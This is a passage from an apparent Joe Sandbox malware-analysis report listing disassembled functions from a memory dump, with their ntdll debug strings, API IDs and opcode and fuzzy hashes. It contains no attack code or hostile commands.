104a650-104a659 405->414 406->405 415 1097a52-1097a5b 406->415 407->399 407->413 427 104a65e-104a665 409->427 428 104a53f-104a567 409->428 411 104a467-104a46c 410->411 412 104a57b-104a582 410->412 411->331 418 104a46e 411->418 412->379 419 104a588 412->419 413->399 422 104a512-104a51b 413->422 414->403 420 1097a5d-1097a60 415->420 421 1097a85-1097a87 415->421 417->389 418->331 419->378 424 1097a6e-1097a71 420->424 425 1097a62-1097a6c 420->425 421->405 426 1097a8d-1097a96 421->426 422->403 432 1097a7e 424->432 433 1097a73-1097a7c 424->433 431 1097a81 425->431 426->403 429 104a569-104a56b 427->429 430 104a66b-104a66e 427->430 428->429 429->411 434 104a571-104a573 429->434 430->429 435 104a674-104a67c 430->435 431->421 432->431 433->426 436 1097a9b-1097aa4 434->436 437 104a579 434->437 435->393 436->437 438 1097aaa-1097ab0 436->438 437->412 438->437 439 1097ab6-1097abe 438->439 439->437 440 1097ac4-1097acf 439->440 440->439 441 1097ad1 440->441 441->437
                                                                                    Strings
                                                                                    • SsHd, xrefs: 0104A3E4
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010979D5
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 010979D0, 010979F5
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010979FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                    • API String ID: 0-929470617
                                                                                    • Opcode ID: 1654af037cc8df1126ec46737817dde131a02bc8f21508129cd8e31bd9c16855
                                                                                    • Instruction ID: 51830589ca6c4cc67ebda3ed84c3aaa51392a4cf1b7a151cc92c3018a4989a75
                                                                                    • Opcode Fuzzy Hash: 1654af037cc8df1126ec46737817dde131a02bc8f21508129cd8e31bd9c16855
                                                                                    • Instruction Fuzzy Hash: B5E1C3B1744302CFEB65CE28C8D476ABBE0ABC8214F14467DF9D6CB291E735E9458B81
                                                                                    Function 0104D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01099346
                                                                                    • GsHd, xrefs: 0104D874
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 01099341, 01099366
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0109936B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                    • API String ID: 3446177414-576511823
                                                                                    • Opcode ID: d44603665f7e0196a23279a781e24290b92cd93cfe8e10ae63fb6cdc304ef546
                                                                                    • Instruction ID: 4ccb1b0e38b813b8577d58aba49852257d8aba7b76ce7ca35156337ee88bd1c0
                                                                                    • Opcode Fuzzy Hash: d44603665f7e0196a23279a781e24290b92cd93cfe8e10ae63fb6cdc304ef546
                                                                                    • Instruction Fuzzy Hash: C6E1B1B46043429FEB61CF98C4D0B6ABBE5BB58318F0449BDE9D5CB281D771E844CB52
                                                                                    Function 0107B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                    • Instruction ID: 2b2e3d4aad7dd55391ec78d81542257b2f6831b67bf1eccfc6e24e9fd580bd02
                                                                                    • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                    • Instruction Fuzzy Hash: 6981E270E052498EEF65CE6CC8907FEBBF1BF45320F18429AD9E1A7291C7349941CB59
                                                                                    Function 01039126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$@
                                                                                    • API String ID: 3446177414-1194432280
                                                                                    • Opcode ID: 93637588da6b37a9f598aeb98ac8974697f3260635f646a4c5a3a27a97a65803
                                                                                    • Instruction ID: c6dccb8fcd70b8f682bab46b2e98b00bd90c5a603430d98a0c95d386883a8734
                                                                                    • Opcode Fuzzy Hash: 93637588da6b37a9f598aeb98ac8974697f3260635f646a4c5a3a27a97a65803
                                                                                    • Instruction Fuzzy Hash: 1A811A72D00269ABDB359F54CC44BEEB7B8AB48754F0041EAEA59B7280D7705E84DFA0
                                                                                    Function 01074960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0Ivw$0Ivw$0Ivw$X
                                                                                    • API String ID: 3446177414-3775388739
                                                                                    • Opcode ID: 9e71f420dea8ca60e599fbcca09b70c3075898e3aed2caccf5d99102b5b4e8d4
                                                                                    • Instruction ID: 70336041f97ae327d9c6474930d37c6638b021722506ffd7f09f1bb74a1e8563
                                                                                    • Opcode Fuzzy Hash: 9e71f420dea8ca60e599fbcca09b70c3075898e3aed2caccf5d99102b5b4e8d4
                                                                                    • Instruction Fuzzy Hash: 0E31C231D0425EFBCF36EF69D804B8D3BB1AB84754F0A8069FD5496241D3748AA0CF5A
                                                                                    Function 0105DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                    • API String ID: 3446177414-56086060
                                                                                    • Opcode ID: 190c2bfc4946f6f43f83a02bf09abc2510dc1dd067664fd7e6e3415607626bed
                                                                                    • Instruction ID: 873b4739185c8596683814d55d7687628b10774e453d4a561ed1f226364be9a8
                                                                                    • Opcode Fuzzy Hash: 190c2bfc4946f6f43f83a02bf09abc2510dc1dd067664fd7e6e3415607626bed
                                                                                    • Instruction Fuzzy Hash: 40416A31600742DFEB62DF68C454BAEBBE5FF44324F1440A9D9C187691CB78A880DB91
                                                                                    Function 010B4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 010B4899
                                                                                    • LdrpCheckRedirection, xrefs: 010B488F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010B4888
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 3446177414-3154609507
                                                                                    • Opcode ID: 4f81dc52302050909bab896bea98c319be46be1684ab150ee2617ef1c8e8c379
                                                                                    • Instruction ID: 25668a38f7d018de2cb785cda237b3ad9fc0a8a50f6e1fd51aba612855ee0482
                                                                                    • Opcode Fuzzy Hash: 4f81dc52302050909bab896bea98c319be46be1684ab150ee2617ef1c8e8c379
                                                                                    • Instruction Fuzzy Hash: 3D41D332A006519BDB61CE5CD8C0AAA7BE4FF49A50F0505A9EDDADB353D330EA10CB91
                                                                                    Function 0105DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                    • API String ID: 3446177414-3526935505
                                                                                    • Opcode ID: ac6b6b76df1cd4878e79715a86776509d793683ce9845db4b8d7a74479ae0916
                                                                                    • Instruction ID: aad3c2a185e87dadc7c19d09af1e86b8663449314ca40c3ff58dfaa41b4b10a7
                                                                                    • Opcode Fuzzy Hash: ac6b6b76df1cd4878e79715a86776509d793683ce9845db4b8d7a74479ae0916
                                                                                    • Instruction Fuzzy Hash: 2A31F630214795DFEB679B68C819B9EBBE4FF01650F044099E8D68B692C7A8A880C751
                                                                                    Function 0102C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $
                                                                                    • API String ID: 3446177414-3993045852
                                                                                    • Opcode ID: 54e7283a0d0869d1c2523156fbd9e7fb2c08389a044048a40ed510e0f5f6a911
                                                                                    • Instruction ID: df0e265a0579d4cd3431f4013bc9bbefce403deedbb8253506e6acc67797b613
                                                                                    • Opcode Fuzzy Hash: 54e7283a0d0869d1c2523156fbd9e7fb2c08389a044048a40ed510e0f5f6a911
                                                                                    • Instruction Fuzzy Hash: 3F11303290421CEBCF25AF94E8486DC7B71FF44364F108229FDA6672D0CB715A50CB40
                                                                                    Function 0105EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f7696bd2610291656ff9a4827385a7f1aa653a8151540a03ec9410c7da2e10f
                                                                                    • Instruction ID: 5f4f5c3091a0e138126775199b1ab57bbce08ad2212710d90a3a8c8e4aac1428
                                                                                    • Opcode Fuzzy Hash: 9f7696bd2610291656ff9a4827385a7f1aa653a8151540a03ec9410c7da2e10f
                                                                                    • Instruction Fuzzy Hash: A9E110B0D00609DFCFA5CFA9C984A9EBBF1FF48314F24456AE986A7261D774A941CF10
                                                                                    Function 010AEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 85f5bd4966baee70941a5aec8e42524bf7af44977b0f884248f8f064f0a05313
                                                                                    • Instruction ID: 72ad579a0a2c8ca8d5ddbd2538f8efe92c45926c1189624807ea1237bc956b42
                                                                                    • Opcode Fuzzy Hash: 85f5bd4966baee70941a5aec8e42524bf7af44977b0f884248f8f064f0a05313
                                                                                    • Instruction Fuzzy Hash: 82711371A0021AAFDF05DFE8C884ADDBBB5AF48314F54402AE985EB254D734AA05CF90
                                                                                    Function 010AF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 316cffaa4d2e823fe40f98181e0dbf570f44d2a06f7573af7100a9ff9536bed1
                                                                                    • Instruction ID: 40b61401e95f40da0d8709582ee14d8e71f84b3fd1cdf28feb0f1332ef75fbf6
                                                                                    • Opcode Fuzzy Hash: 316cffaa4d2e823fe40f98181e0dbf570f44d2a06f7573af7100a9ff9536bed1
                                                                                    • Instruction Fuzzy Hash: 44514172E0021AAFEF09CFD8D844ADDBBF1BF48354F58812AE955AB250D734AA01CF54
                                                                                    Function 01067B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                    • String ID:
                                                                                    • API String ID: 4281723722-0
                                                                                    • Opcode ID: b9edf7345651eaf4be6c2a684516d724999687a38a4f7b03b3dc2cf2ff4926ef
                                                                                    • Instruction ID: 36f181af312089b520f579c47af79cfd0f93fa29a86abfecca438b4781f56b0b
                                                                                    • Opcode Fuzzy Hash: b9edf7345651eaf4be6c2a684516d724999687a38a4f7b03b3dc2cf2ff4926ef
                                                                                    • Instruction Fuzzy Hash: 6C313475E00229EFCF25EFA8D884A9DBBF0BB58320F14412AE861F7280C7715940CF54
                                                                                    Function 010359C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: cbe9af6c5655ae03e9186debaf2cd7f7e0f06adb6819356460263c17ea8f5bf4
                                                                                    • Instruction ID: 8cdf1e210db72c4c5468d2d85924743058db5548eaa37465bf6e48d322f2e8ab
                                                                                    • Opcode Fuzzy Hash: cbe9af6c5655ae03e9186debaf2cd7f7e0f06adb6819356460263c17ea8f5bf4
                                                                                    • Instruction Fuzzy Hash: 77325970D0426ADFDB65CF68C884BEDBBF8BB48304F0081E9E589A7291D7755A84DF90
                                                                                    Function 01077D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
